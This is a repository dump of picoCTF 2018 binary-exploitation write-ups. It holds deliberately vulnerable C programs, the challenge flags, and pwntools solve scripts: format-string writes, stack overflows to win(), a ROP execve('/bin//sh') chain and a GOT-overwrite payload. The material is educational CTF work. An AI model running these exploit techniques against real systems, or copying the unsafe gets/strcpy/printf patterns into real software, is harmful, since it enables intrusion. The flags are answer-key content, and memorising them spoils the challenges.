[ { "path": ".gitmodules", "content": "[submodule \"Binary Exploitation/can-you-gets-me/solution/ROPgadget\"]\n\tpath = Binary Exploitation/can-you-gets-me/solution/ROPgadget\n\turl = https://github.com/JonathanSalwan/ROPgadget.git\n[submodule \"Cryptography/Super Safe RSA/solution/msieve\"]\n\tpath = Cryptography/Super Safe RSA/solution/msieve\n\turl = https://github.com/radii/msieve.git\n[submodule \"Cryptography/Super Safe RSA 3/solution/msieve\"]\n\tpath = Cryptography/Super Safe RSA 3/solution/msieve\n\turl = https://github.com/radii/msieve.git\n" }, { "path": "Binary Exploitation/are you root?/README.md", "content": "# are you root?\nPoints: 550\n\n## Category\nBinary Exploitation\n\n## Question\n>Can you get root access through this [service](files/auth) and get the flag? Connect with `nc 2018shell1.picoctf.com 29508`. [Source](files/auth.c). \n\n### Hint\n>If only the program used calloc to zero out the memory..\n\n## Solution\nUnsolved.\n\n### Flag\n`flag`\n" }, { "path": "Binary Exploitation/are you root?/files/auth.c", "content": "#include \n#include \n#include \n#include \n\ntypedef enum auth_level {\n ANONYMOUS = 1,\n GUEST = 2,\n USER = 3,\n ADMIN = 4,\n ROOT = 5\n} auth_level_t;\n \nstruct user {\n char *name;\n auth_level_t level;\n};\n\nvoid give_flag(){\n char flag[48];\n FILE *f = fopen(\"flag.txt\", \"r\");\n if (f == NULL) {\n printf(\"Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\\n\");\n exit(0);\n }\n\n if ((fgets(flag, 48, f)) == NULL){\n puts(\"Couldn't read flag file.\");\n exit(1);\n };\n \n puts(flag);\n fclose(f);\n}\n\nvoid menu(){\n puts(\"Available commands:\");\n puts(\"\\tshow - show your current user and authorization level\");\n puts(\"\\tlogin [name] - log in as [name]\");\n puts(\"\\tset-auth [level] - set your authorization level (must be below 5)\");\n puts(\"\\tget-flag - print the flag (requires authorization level 5)\");\n puts(\"\\treset - log out and reset authorization level\");\n puts(\"\\tquit - exit the program\");\n}\n\nint main(int argc, char **argv){\n char buf[512];\n char *arg;\n uint32_t level;\n struct user *user;\n\n setbuf(stdout, NULL);\n\n menu();\n\n user = NULL;\n while(1){\n puts(\"\\nEnter your command:\");\n putchar('>'); putchar(' ');\n\n if(fgets(buf, 512, stdin) == NULL)\n break;\n\n if (!strncmp(buf, \"show\", 4)){\n if(user == NULL){\n\tputs(\"Not logged in.\");\n }else{\n\tprintf(\"Logged in as %s [%u]\\n\", user->name, user->level);\n }\n\n }else if (!strncmp(buf, \"login\", 5)){\n if (user != NULL){\n\tputs(\"Already logged in. Reset first.\");\n\tcontinue;\n }\n\n arg = strtok(&buf[6], \"\\n\");\n if (arg == NULL){\n\tputs(\"Invalid command\");\n\tcontinue;\n }\n\n user = (struct user *)malloc(sizeof(struct user));\n if (user == NULL) {\n\tputs(\"malloc() returned NULL. Out of Memory\\n\");\n\texit(-1);\n }\n user->name = strdup(arg);\n printf(\"Logged in as \\\"%s\\\"\\n\", arg);\n\n }else if(!strncmp(buf, \"set-auth\", 8)){\n if(user == NULL){\n\tputs(\"Login first.\");\n\tcontinue;\n }\n\n arg = strtok(&buf[9], \"\\n\");\n if (arg == NULL){\n\tputs(\"Invalid command\");\n\tcontinue;\n }\n\n level = strtoul(arg, NULL, 10);\n\n if (level >= 5){\n\tputs(\"Can only set authorization level below 5\");\n\tcontinue;\n }\n\n user->level = level;\n printf(\"Set authorization level to \\\"%u\\\"\\n\", level);\n\n }else if(!strncmp(buf, \"get-flag\", 8)){\n if (user == NULL){\n\tputs(\"Login first!\");\n\tcontinue;\n }\n\n if (user->level != 5){\n\tputs(\"Must have authorization level 5.\");\n\tcontinue;\n }\n\n give_flag();\n }else if(!strncmp(buf, \"reset\", 5)){\n if (user == NULL){\n\tputs(\"Not logged in!\");\n\tcontinue;\n }\n\n free(user->name);\n user = NULL;\n\n puts(\"Logged out!\");\n }else if(!strncmp(buf, \"quit\", 4)){\n return 0;\n }else{\n puts(\"Invalid option\");\n menu();\n }\n }\n}\n" }, { "path": "Binary Exploitation/authenticate/README.md", "content": "# authenticate\nPoints: 350\n\n## Category\nBinary Exploitation\n\n## Question\n>Can you [authenticate](files/auth) to this service and get the flag? Connect with nc 2018shell1.picoctf.com 27114. [Source](files/auth.c). \n\n### Hint\n>What happens if you say something OTHER than yes or no?\n\n## Solution\nLooking at the source code, there appears to be some sort of authentication service, with no actual way to authenticate.\n\nWe can see that there's an _authenticated_ variable, which is set to _0_, and never changed anywhere in the code. We also notice that there is possibly a form of format string vulnerability.\n\n```c\nint main(int argc, char **argv) {\n\tchar buf[64];\n\tprintf(\"Would you like to read the flag? (yes/no)\\n\");\n\n\tfgets(buf, sizeof(buf), stdin);\n\n\tif (strstr(buf, \"no\") != NULL) {\n\t\tprintf(\"Okay, Exiting...\\n\");\n\t\texit(1);\n\t}\n\telse if (strstr(buf, \"yes\") == NULL) {\n\t\tputs(\"Received Unknown Input:\\n\");\n\t\tprintf(buf); // Format String Vulnerability\n\t} \n\tread_flag();\n}\n```\n\nWe can try running the binary and inputting _%x_ to see if any values from the stack leaks.\n\n```\n$ ./auth \nWould you like to read the flag? (yes/no)\n%x%x\nReceived Unknown Input:\n\n80489a6f7f235c0\nSorry, you are not *authenticated*!\n```\n\nLet's find out where the authenticated varialbe is located and its corresponding value.\n\n```\n[0x08048560]> s obj.authenticated \n[0x0804a04c]> px 4\n- offset - 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF\n0x0804a04c 0000 0000 ....\n[0x0804a04c]> s\n0x804a04c\n```\n\nLooks like it's located at _0x804a04c_ with a value of _0_. Let's craft an exploit. We add characters with familiar know hex values followed by multiple _%x_\n\n```\n$ ./auth \nWould you like to read the flag? (yes/no)\nAAAA %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x\nReceived Unknown Input:\n\nAAAA 80489a6 f7f5b5c0 804875a 0 c30000 0 fffd3ff4 0 0 0 41414141 20782520 25207825 78252078 20782520 25207825 78252078 20782520 25207825 Sorry, you are not *authenticated*!\n```\n\nLooks like the 11th _%x_ did the trick. Now substitue _AAAA_ with the little endian values of the _authenticated_ variable's address and all the _%x_ with _%11$n_. This will overwrite the value of _authenticated_.\n\nSend the exploit to the service and get the flag.\n\nWorking solution [solve.py](solution/solve.py).\n\n### Flag\n`picoCTF{y0u_4r3_n0w_aUtH3nt1c4t3d_742b49a4}`\n" }, { "path": "Binary Exploitation/authenticate/files/auth.c", "content": "#include \n#include \n#include \n#include \n#include \n\nint authenticated = 0;\n\nint flag() {\n char flag[48];\n FILE *file;\n file = fopen(\"flag.txt\", \"r\");\n if (file == NULL) {\n printf(\"Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\\n\");\n exit(0);\n }\n\n fgets(flag, sizeof(flag), file);\n printf(\"%s\", flag);\n return 0;\n}\n\nvoid read_flag() {\n if (!authenticated) {\n printf(\"Sorry, you are not *authenticated*!\\n\");\n }\n else {\n printf(\"Access Granted.\\n\");\n flag();\n }\n\n}\n\nint main(int argc, char **argv) {\n\n setvbuf(stdout, NULL, _IONBF, 0);\n\n char buf[64];\n \n // Set the gid to the effective gid\n // this prevents /bin/sh from dropping the privileges\n gid_t gid = getegid();\n setresgid(gid, gid, gid);\n \n printf(\"Would you like to read the flag? (yes/no)\\n\");\n\n fgets(buf, sizeof(buf), stdin);\n \n if (strstr(buf, \"no\") != NULL) {\n printf(\"Okay, Exiting...\\n\");\n exit(1);\n }\n else if (strstr(buf, \"yes\") == NULL) {\n puts(\"Received Unknown Input:\\n\");\n printf(buf);\n }\n \n read_flag();\n\n}\n" }, { "path": "Binary Exploitation/authenticate/solution/solve.py", "content": "#!/usr/bin/python\nfrom pwn import *\nfrom time import sleep\nimport re\n\nauth_addr = p32(0x0804a04c)\nexploit = auth_addr + '%11$n'\n\nlog.info('Exploit created')\n\ns = remote('2018shell1.picoctf.com', 27114)\nprint s.recv()\nlog.info('Sending exploit...')\ns.sendline(exploit)\nsleep(0.5)\nlog.info('Sent!')\nflag = s.recv()\n\nlog.success('Flag: ' + re.findall(r'(picoCTF\\{.+\\})', flag)[0])\n" }, { "path": "Binary Exploitation/buffer overflow 0/README.md", "content": "# buffer overflow 0\nPoints: 150\n\n## Category\nBinary Exploitation\n\n## Question\n>Let's start off simple, can you overflow the right buffer in this [program](files/vuln) to get the flag? You can also find it in /problems/buffer-overflow-0_2_aab3d2a22456675a9f9c29783b256a3d on the shell server. [Source](files/vuln.c). \n\n### Hint\n>How can you trigger the flag to print?\n>\n>If you try to do the math by hand, maybe try and add a few more characters. Sometimes there are things you aren't expecting.\n\n## Solution\nWe can try pwning the binary locally first. Firstly, create a file _flag.txt_ and add some contents into it.\n\nDo a sample run of the program.\n\n```\n$ ./vuln \nThis program takes 1 argument.\n```\n\nOk, now we try with an argument\n\n```\n$ ./vuln AAAA\nThanks! Received: AAAA\n```\n\nSeems like it's redirecting the input into output. Let's take a look at the source code.\n\n```c\n// Imports here...\n// Define flag size here...\nvoid sigsegv_handler(int sig) {\n\tfprintf(stderr, \"%s\\n\", flag);\n\tfflush(stderr);\n\texit(1);\n}\n\nvoid vuln(char *input){\n\tchar buf[16];\n\tstrcpy(buf, input);\n}\n\nint main(int argc, char **argv){\n\t// Reading flag here...\n\tsignal(SIGSEGV, sigsegv_handler);\n\t// gid settings here...\n\tif (argc > 1) {\n\t\tvuln(argv[1]);\n\t\tprintf(\"Thanks! Received: %s\", argv[1]);\n\t}\n\telse\n\t\tprintf(\"This program takes 1 argument.\\n\");\n\treturn 0;\n}\n```\n\nIt looks like the `signal(SIGSEGV, sigsegv_handler)` redirects execution to `sigsegv_handler()` and prints the flag.\n\nIn `vuln()`, there is no boundary checking, so even though there is only space for 16 bytes, it `strcpy()` will keep inserting bytes into `buf`.\n\nWe can try running the program again, but this time, with a lot more characters.\n\n```\n$ ./vuln AAAAAAAAAAAAAAAAAAAAAAAAAAAA\npicoCTF{sample_flag}\n```\n\nWe did it locally! It takes 28 or more bytes to leak out the flag.\n\nAll we have to do is send it to the webshell.\n\n```\n$ /problems/buffer-overflow-0_2_aab3d2a22456675a9f9c29783b256a3d/vuln AAAAAAAAAAAAAAAAAAAAAAAAAAAA\npicoCTF{ov3rfl0ws_ar3nt_that_bad_5d8a1fae}\n```\n\nWorking solution [solve.py](solution/solve.py)\n\n### Flag\n`picoCTF{ov3rfl0ws_ar3nt_that_bad_5d8a1fae}`\n" }, { "path": "Binary Exploitation/buffer overflow 0/files/vuln.c", "content": "#include \n#include \n#include \n#include \n\n#define FLAGSIZE_MAX 64\n\nchar flag[FLAGSIZE_MAX];\n\nvoid sigsegv_handler(int sig) {\n fprintf(stderr, \"%s\\n\", flag);\n fflush(stderr);\n exit(1);\n}\n\nvoid vuln(char *input){\n char buf[16];\n strcpy(buf, input);\n}\n\nint main(int argc, char **argv){\n \n FILE *f = fopen(\"flag.txt\",\"r\");\n if (f == NULL) {\n printf(\"Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\\n\");\n exit(0);\n }\n fgets(flag,FLAGSIZE_MAX,f);\n signal(SIGSEGV, sigsegv_handler);\n \n gid_t gid = getegid();\n setresgid(gid, gid, gid);\n \n if (argc > 1) {\n vuln(argv[1]);\n printf(\"Thanks! Received: %s\", argv[1]);\n }\n else\n printf(\"This program takes 1 argument.\\n\");\n return 0;\n}\n" }, { "path": "Binary Exploitation/buffer overflow 0/solution/flag.txt", "content": "picoCTF{sample_flag}" }, { "path": "Binary Exploitation/buffer overflow 0/solution/solve.py", "content": "#!/usr/bin/python\nfrom pwn import *\n\nUSER = 'Platy' # Change username accordingly.\n\ns = ssh(host='2018shell1.picoctf.com', user=USER) # Make sure ssh-keyz challenge is done first\n\nexploit = 'A' * 28\n\npy = s.run('cd /problems/buffer-overflow-0_2_aab3d2a22456675a9f9c29783b256a3d; ./vuln {}'.format(exploit))\nprint py.recv()\ns.close()\n" }, { "path": "Binary Exploitation/buffer overflow 1/README.md", "content": "# buffer overflow 1\nPoints: 200\n\n## Category\nBinary Exploitation\n\n## Question\n>Okay now you're cooking! This time can you overflow the buffer and return to the flag function in this program? You can find it in /problems/buffer-overflow-1_3_af8f83fb19a7e2c98e28e325e4cacf78 on the shell server. Source. \n\n### Hint\n>This time you're actually going to have to control that return address!\n>\n>Make sure you consider Big Endian vs Little Endian.\n\n## Solution\nBefore looking at the source code, we can run the program first.\n\n```\n$ ./vuln \nPlease enter your string: \nAAAA\nOkay, time to return... Fingers Crossed... Jumping to 0x80486b3\n```\n\nLooks like it takes in an input, and jumps to an address. Let's look at the source code now.\n\n```c\n// Imports here...\n#define BUFSIZE 32\n#define FLAGSIZE 64\n\nvoid win() {\n\tchar buf[FLAGSIZE];\n\tFILE *f = fopen(\"flag.txt\",\"r\");\n\t// Reading flag file\n\tprintf(buf);\n}\n\nvoid vuln(){\n\tchar buf[BUFSIZE];\n\tgets(buf);\n\n\tprintf(\"Okay, time to return... Fingers Crossed... Jumping to 0x%x\\n\", get_return_address());\n}\n\nint main(int argc, char **argv){\n\t// Unimportant stuff\n\tputs(\"Please enter your string: \");\n\tvuln();\n\treturn 0;\n}\n```\n\nWe can see that the address that it shows us is the return address, which should be the address of _main_. If we do a buffer overflow, we can take control of the return address, and let the program jump to wherever we want.\n\nIn this case, we would like to jump to the _win_ function, which prints out the flag.\n\nLet's try spamming the program again to see if our hunch is correct.\n\n```\n$ ./vuln \nPlease enter your string: \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nOkay, time to return... Fingers Crossed... Jumping to 0x41414141\nSegmentation fault\n```\n\nThe return address has been overwritten to _0x41414141_, which is the hex value of _A_. As long as we can find the correct amount of padding, we can control the where the return pointer returns to.\n\nWe can use the [De Bruijn sequence](https://en.wikipedia.org/wiki/De_Bruijn_sequence), which will find the padding we need. We will use _pwntools_.\n\n```python\n>>> from pwn import *\n>>> cyclic(100)\n'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa'\n```\n\nWe can now feed that string into the program and see what address the program jumps to.\n\n```\n$ ./vuln \nPlease enter your string: \naaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa\nOkay, time to return... Fingers Crossed... Jumping to 0x6161616c\nSegmentation fault\n```\n\nOk, it jumps to _0x6161616c_. We can use `cyclic_find()` to find the offset. First we convert the hex back into ASCII. Remember that this is in little endian format. `p32()` just converts the hex back into ASCII in little endian format.\n\n```python\n>>> from pwn import *\n>>> cyclic_find(p32(0x6161616c))\n44\n```\n\nNow we know the amount of padding required. Let's test it again, with 44 'A's, and another 4 'B's. We should expect the address to show _0x41414141_.\n\n```\n$ ./vuln \nPlease enter your string: \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB\nOkay, time to return... Fingers Crossed... Jumping to 0x42424242\nSegmentation fault\n```\n\nJust as we expected. All that's left to do is to replace _BBBB_ with the ASCII values that corresponds to the address of the _win_ function.\n\n\n```python\n>>> from pwn import *\n>>> vuln = ELF('./vuln')\n[*] '/root/Desktop/picoCTF/Binary Exploitation/buffer overflow 1/solution/vuln'\n Arch: i386-32-little\n RELRO: Partial RELRO\n Stack: No canary found\n NX: NX disabled\n PIE: No PIE (0x8048000)\n RWX: Has RWX segments\n>>> p32(vuln.symbols['win']) # Get address of win function\n'\\xcb\\x85\\x04\\x08'\n>>> 'A' * 44 + '\\xcb\\x85\\x04\\x08'\n'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\xcb\\x85\\x04\\x08'\n```\n\nOf course, we cannot type _\\xcb\\x85\\x04\\x08_ in ASCII format, so all we have to do is have Python output this string, and pipe it into the program _vuln_.\n\n```\n$ python -c \"from pwn import *; print 'A' * 44 + '\\xcb\\x85\\x04\\x08'\" | ./vuln \nPlease enter your string: \nOkay, time to return... Fingers Crossed... Jumping to 0x80485cb\npicoCTF{sample_flag}\nSegmentation fault\n```\n\nGreat! It works locally, all we have to do now is run it on the web shell.\n\n```\n$ cd /problems/buffer-overflow-1_3_af8f83fb19a7e2c98e28e325e4cacf78\n$ python -c \"from pwn import *; print 'A' * 44 + '\\xcb\\x85\\x04\\x08'\" | ./vuln\nPlease enter your string: \nOkay, time to return... Fingers Crossed... Jumping to 0x80485cb\npicoCTF{addr3ss3s_ar3_3asy65489706}Segmentation fault\n```\n\nAnd we get the flag!\n\nWorking solution [solve.py](solution/solve.py)\n\n### Flag\n`picoCTF{addr3ss3s_ar3_3asy65489706}`\n" }, { "path": "Binary Exploitation/buffer overflow 1/files/flag.txt", "content": "picoCTF{addr3ss3s_ar3_3asy65489706}\n" }, { "path": "Binary Exploitation/buffer overflow 1/files/vuln.c", "content": "#include \n#include \n#include \n#include \n#include \n#include \"asm.h\"\n\n#define BUFSIZE 32\n#define FLAGSIZE 64\n\nvoid win() {\n char buf[FLAGSIZE];\n FILE *f = fopen(\"flag.txt\",\"r\");\n if (f == NULL) {\n printf(\"Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\\n\");\n exit(0);\n }\n\n fgets(buf,FLAGSIZE,f);\n printf(buf);\n}\n\nvoid vuln(){\n char buf[BUFSIZE];\n gets(buf);\n\n printf(\"Okay, time to return... Fingers Crossed... Jumping to 0x%x\\n\", get_return_address());\n}\n\nint main(int argc, char **argv){\n\n setvbuf(stdout, NULL, _IONBF, 0);\n \n gid_t gid = getegid();\n setresgid(gid, gid, gid);\n\n puts(\"Please enter your string: \");\n vuln();\n return 0;\n}\n\n" }, { "path": "Binary Exploitation/buffer overflow 1/solution/flag.txt", "content": "picoCTF{sample_flag}\n" }, { "path": "Binary Exploitation/buffer overflow 1/solution/solve.py", "content": "#!/usr/bin/python\nfrom pwn import *\nimport os\n\nPATH = os.path.dirname(os.path.realpath(__file__))\n\nUSER = 'Platy' # Change username accordingly.\n\nvuln = ELF(PATH + '/vuln')\n\npadding = 'A' * 44\npayload = p32(vuln.symbols['win'])\n\nexploit = padding + payload\n\ns = ssh(host='2018shell1.picoctf.com', user=USER) # Make sure ssh-keyz challenge is done first\n\npy = s.run('cd /problems/buffer-overflow-1_3_af8f83fb19a7e2c98e28e325e4cacf78; ./vuln')\nprint py.recv()\npy.sendline(exploit)\nprint py.recv()\ns.close()\n" }, { "path": "Binary Exploitation/buffer overflow 2/README.md", "content": "# buffer overflow 2\nPoints: 250\n\n## Category\nBinary Exploitation\n\n## Question\n>Alright, this time you'll need to control some arguments. Can you get the flag from this [program](files/vuln)? You can find it in /problems/buffer-overflow-2_0_738235740acfbf7941e233ec2f86f3b4 on the shell server. [Source](files/vuln.c). \n\n### Hint\n>Try using gdb to print out the stack once you write to it!\n\n## Solution\nWorking solution [solve.py](solution/solve.py)\n\n\n### Flag\n`picoCTF{addr3ss3s_ar3_3asyada28e9b}`\n" }, { "path": "Binary Exploitation/buffer overflow 2/files/flag.txt", "content": "picoCTF{addr3ss3s_ar3_3asyada28e9b}\n" }, { "path": "Binary Exploitation/buffer overflow 2/files/vuln.c", "content": "#include \n#include \n#include \n#include \n#include \n\n#define BUFSIZE 100\n#define FLAGSIZE 64\n\nvoid win(unsigned int arg1, unsigned int arg2) {\n char buf[FLAGSIZE];\n FILE *f = fopen(\"flag.txt\",\"r\");\n if (f == NULL) {\n printf(\"Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\\n\");\n exit(0);\n }\n\n fgets(buf,FLAGSIZE,f);\n if (arg1 != 0xDEADBEEF)\n return;\n if (arg2 != 0xDEADC0DE)\n return;\n printf(buf);\n}\n\nvoid vuln(){\n char buf[BUFSIZE];\n gets(buf);\n puts(buf);\n}\n\nint main(int argc, char **argv){\n\n setvbuf(stdout, NULL, _IONBF, 0);\n \n gid_t gid = getegid();\n setresgid(gid, gid, gid);\n\n puts(\"Please enter your string: \");\n vuln();\n return 0;\n}\n\n" }, { "path": "Binary Exploitation/buffer overflow 2/solution/solve.py", "content": "#!/usr/bin/python\n\nfrom pwn import *\n\nvuln = ELF('./vuln')\npadding = 'A' * 112\npayload = p32(vuln.symbols['win'])\n\nexploit = padding + payload + asm('nop') * 4 + p32(0xDEADBEEF) + p32(0xDEADC0DE)\n\ns = ssh(host='2018shell1.picoctf.com', user='Platy')\n\npy = s.run('cd /problems/buffer-overflow-2_0_738235740acfbf7941e233ec2f86f3b4; ./vuln')\nprint py.recv()\npy.sendline(exploit)\nprint py.recv()\ns.close()\n" }, { "path": "Binary Exploitation/buffer overflow 3/README.md", "content": "# buffer overflow 3\nPoints: 450\n\n## Category\nBinary Exploitation\n\n## Question\n>It looks like Dr. Xernon added a stack canary to this [program](files/vuln) to protect against buffer overflows. Do you think you can bypass the protection and get the flag? You can find it in /problems/buffer-overflow-3_3_6bcc2aa22b2b7a4a7e3ca6b2e1194faf. [Source](files/vuln.c). \n\n### Hint\n>Maybe there's a smart way to brute-force the canary?\n\n## Solution\nUnsolved.\n\n### Flag\n`flag`\n" }, { "path": "Binary Exploitation/buffer overflow 3/files/vuln.c", "content": "#include \n#include \n#include \n#include \n#include \n#include \n#include \n\n#define BUFSIZE 32\n#define FLAGSIZE 64\n#define CANARY_SIZE 4\n\nvoid win() {\n char buf[FLAGSIZE];\n FILE *f = fopen(\"flag.txt\",\"r\");\n if (f == NULL) {\n printf(\"Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\\n\");\n exit(0);\n }\n\n fgets(buf,FLAGSIZE,f);\n puts(buf);\n fflush(stdout);\n}\n\nchar global_canary[CANARY_SIZE];\nvoid read_canary() {\n FILE *f = fopen(\"canary.txt\",\"r\");\n if (f == NULL) {\n printf(\"Canary is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\\n\");\n exit(0);\n }\n\n fread(global_canary,sizeof(char),CANARY_SIZE,f);\n fclose(f);\n}\n\nvoid vuln(){\n char canary[CANARY_SIZE];\n char buf[BUFSIZE];\n char length[BUFSIZE];\n int count;\n int x = 0;\n memcpy(canary,global_canary,CANARY_SIZE);\n printf(\"How Many Bytes will You Write Into the Buffer?\\n> \");\n while (x \");\n read(0,buf,count);\n\n if (memcmp(canary,global_canary,CANARY_SIZE)) {\n printf(\"*** Stack Smashing Detected *** : Canary Value Corrupt!\\n\");\n exit(-1);\n }\n printf(\"Ok... Now Where's the Flag?\\n\");\n fflush(stdout);\n}\n\nint main(int argc, char **argv){\n\n setvbuf(stdout, NULL, _IONBF, 0);\n \n // Set the gid to the effective gid\n // this prevents /bin/sh from dropping the privileges\n int i;\n gid_t gid = getegid();\n setresgid(gid, gid, gid);\n read_canary();\n vuln();\n return 0;\n}\n" }, { "path": "Binary Exploitation/can-you-gets-me/README.md", "content": "# can-you-gets-me\nPoints: 650\n\n## Category\nBinary Exploitation\n\n## Question\n>Can you exploit the following [program](files/gets) to get a flag? You may need to think return-oriented if you want to program your way to the flag. You can find the program in /problems/can-you-gets-me_1_e66172cf5b6d25fffee62caf02c24c3d on the shell server. [Source](files/gets.c). \n\n### Hint\n>This is a classic gets ROP\n\n## Solution\nFirst, find out the padding required for the buffer overflow. Then, use a rop chain to get the flag.\n\nROP chain generated by [ROPgadget](https://github.com/JonathanSalwan/ROPgadget).\n\nWorking solution [solve.py](solution/solve.py).\n\n### Flag\n`picoCTF{rOp_yOuR_wAY_tO_AnTHinG_700e9c8e}`\n" }, { "path": "Binary Exploitation/can-you-gets-me/files/gets.c", "content": "#include \n#include \n#include \n#include \n#include \n\n#define BUFSIZE 16\n\nvoid vuln() {\n char buf[16];\n printf(\"GIVE ME YOUR NAME!\\n\");\n return gets(buf);\n\n}\n\nint main(int argc, char **argv){\n\n setvbuf(stdout, NULL, _IONBF, 0);\n \n\n // Set the gid to the effective gid\n // this prevents /bin/sh from dropping the privileges\n gid_t gid = getegid();\n setresgid(gid, gid, gid);\n vuln();\n \n}\n" }, { "path": "Binary Exploitation/can-you-gets-me/solution/solve.py", "content": "#!/usr/bin/python\nfrom pwn import *\n\nUSER = 'Platy' # Change username accordingly.\n\npadding = 'A' * 28\n# execve generated by ROPgadget\nrop_gadgets = p32(0x0806f02a) # porop_gadgets edx ; ret\nrop_gadgets += p32(0x080ea060) # @ .data\nrop_gadgets += p32(0x080b81c6) # porop_gadgets eax ; ret\nrop_gadgets += '/bin'\nrop_gadgets += p32(0x080549db) # mov dword ptr [edx], eax ; ret\nrop_gadgets += p32(0x0806f02a) # porop_gadgets edx ; ret\nrop_gadgets += p32(0x080ea064) # @ .data + 4\nrop_gadgets += p32(0x080b81c6) # porop_gadgets eax ; ret\nrop_gadgets += '//sh'\nrop_gadgets += p32(0x080549db) # mov dword ptr [edx], eax ; ret\nrop_gadgets += p32(0x0806f02a) # porop_gadgets edx ; ret\nrop_gadgets += p32(0x080ea068) # @ .data + 8\nrop_gadgets += p32(0x08049303) # xor eax, eax ; ret\nrop_gadgets += p32(0x080549db) # mov dword ptr [edx], eax ; ret\nrop_gadgets += p32(0x080481c9) # porop_gadgets ebx ; ret\nrop_gadgets += p32(0x080ea060) # @ .data\nrop_gadgets += p32(0x080de955) # porop_gadgets ecx ; ret\nrop_gadgets += p32(0x080ea068) # @ .data + 8\nrop_gadgets += p32(0x0806f02a) # porop_gadgets edx ; ret\nrop_gadgets += p32(0x080ea068) # @ .data + 8\nrop_gadgets += p32(0x08049303) # xor eax, eax ; ret\nrop_gadgets += p32(0x0807a86f) # inc eax ; ret\nrop_gadgets += p32(0x0807a86f) # inc eax ; ret\nrop_gadgets += p32(0x0807a86f) # inc eax ; ret\nrop_gadgets += p32(0x0807a86f) # inc eax ; ret\nrop_gadgets += p32(0x0807a86f) # inc eax ; ret\nrop_gadgets += p32(0x0807a86f) # inc eax ; ret\nrop_gadgets += p32(0x0807a86f) # inc eax ; ret\nrop_gadgets += p32(0x0807a86f) # inc eax ; ret\nrop_gadgets += p32(0x0807a86f) # inc eax ; ret\nrop_gadgets += p32(0x0807a86f) # inc eax ; ret\nrop_gadgets += p32(0x0807a86f) # inc eax ; ret\nrop_gadgets += p32(0x0806cc25) # int 0x80\n\nexploit = padding + rop_gadgets\n\ns = ssh(host='2018shell1.picoctf.com', user=USER) # Make sure ssh-keyz challenge is done first\n\npy = s.run('cd /problems/can-you-gets-me_1_e66172cf5b6d25fffee62caf02c24c3d; ./gets')\nprint py.recv()\npy.sendline(exploit)\npy.sendline('cat flag.txt')\nprint py.recv()\npy.interactive()\n" }, { "path": "Binary Exploitation/echo back/README.md", "content": "# echo back\nPoints: 500\n\n## Category\nBinary Exploitation\n\n## Question\nThis [program](files/echoback) we found seems to have a vulnerability. Can you get a shell and retreive the flag? Connect to it with `nc 2018shell1.picoctf.com 22462`.\n\n### Hint\n>hmm, printf seems to be dangerous...\n>\n>You may need to modify more than one address at once.\n>\n>Ever heard of the Global Offset Table?\n\n## Solution\nUnsolved.\n\n### Flag\n`flag`\n" }, { "path": "Binary Exploitation/echo back/solution/solve.py", "content": "#!/usr/bin/python\nfrom pwn import *\n\ncontext.log_level = 'error'\n\nechoback = ELF('./echoback')\n\nputs_got_addr = echoback.got['puts']\nsystem_got_addr = p32(echoback.got['system'])\n\npayload = '%59348x%8$n'\npayload += '%4095x%9$n'\n\nprint \"sh;#\" + p32(puts_got_addr) + p32(puts_got_addr + 2) + payload\n\n# 0x804a020\n# 0xf7e0e7e0\n" }, { "path": "Binary Exploitation/echooo/README.md", "content": "# echooo \nPoints: 300\n\n## Category\nBinary Exploitation\n\n## Question\n>This program prints any input you give it. Can you [leak](files/echo) the flag? Connect with `nc 2018shell1.picoctf.com 46960`. [Source](files/echo.c). \n\n### Hint\n>If only the program used puts...\n\n## Solution\nA simple format string exploit.\n\nLooking at the source code, we see that the flag is stored in the stack. All we have to do is to leak values from the stack to get the flag.\n\nDoing some testing locally, we see that the flag starts at _%29$x_. This format simply takes the 29th argument and print it out as hex.\n\nSince the buffer only accepts 64 bytes, we have to stagger the inputs.\n\n```\n$ python solve.py \n[+] Opening connection to 2018shell1.picoctf.com on port 46960: Done\nTime to learn about Format Strings!\nWe will evaluate any format string you give us with printf().\nSee if you can get the flag!\n> %27$x %28$x %29$x %30$x %31$x %32$x %33$x %34$x %35$x %36$x\n[*] Flag Part 1: 6f636970 7b465443 6d526f66 735f7434 6e695274 615f7347 445f6552 65476e61 73753072 6237615f\n> %37$x %38$x %39$x %40$x %41$x\n[*] Flag Part 2: 32613463 a7d64 80487ab 1 ffe42d84\n[+] Flag: picoCTF{foRm4t_stRinGs_aRe_DanGer0us_a7bc4a2d}\n[*] Closed connection to 2018shell1.picoctf.com port 46960\n```\n\nWorking solution [solve.py](solution/solve.py)\n\n### Flag\n`picoCTF{foRm4t_stRinGs_aRe_DanGer0us_a7bc4a2d}`\n" }, { "path": "Binary Exploitation/echooo/files/echo.c", "content": "#include \n#include \n#include \n#include \n#include \n\nint main(int argc, char **argv){\n\n setvbuf(stdout, NULL, _IONBF, 0);\n\n char buf[64];\n char flag[64];\n char *flag_ptr = flag;\n \n // Set the gid to the effective gid\n gid_t gid = getegid();\n setresgid(gid, gid, gid);\n\n memset(buf, 0, sizeof(flag));\n memset(buf, 0, sizeof(buf));\n\n puts(\"Time to learn about Format Strings!\");\n puts(\"We will evaluate any format string you give us with printf().\");\n puts(\"See if you can get the flag!\");\n \n FILE *file = fopen(\"flag.txt\", \"r\");\n if (file == NULL) {\n printf(\"Flag File is Missing. Problem is Misconfigured, please contact an 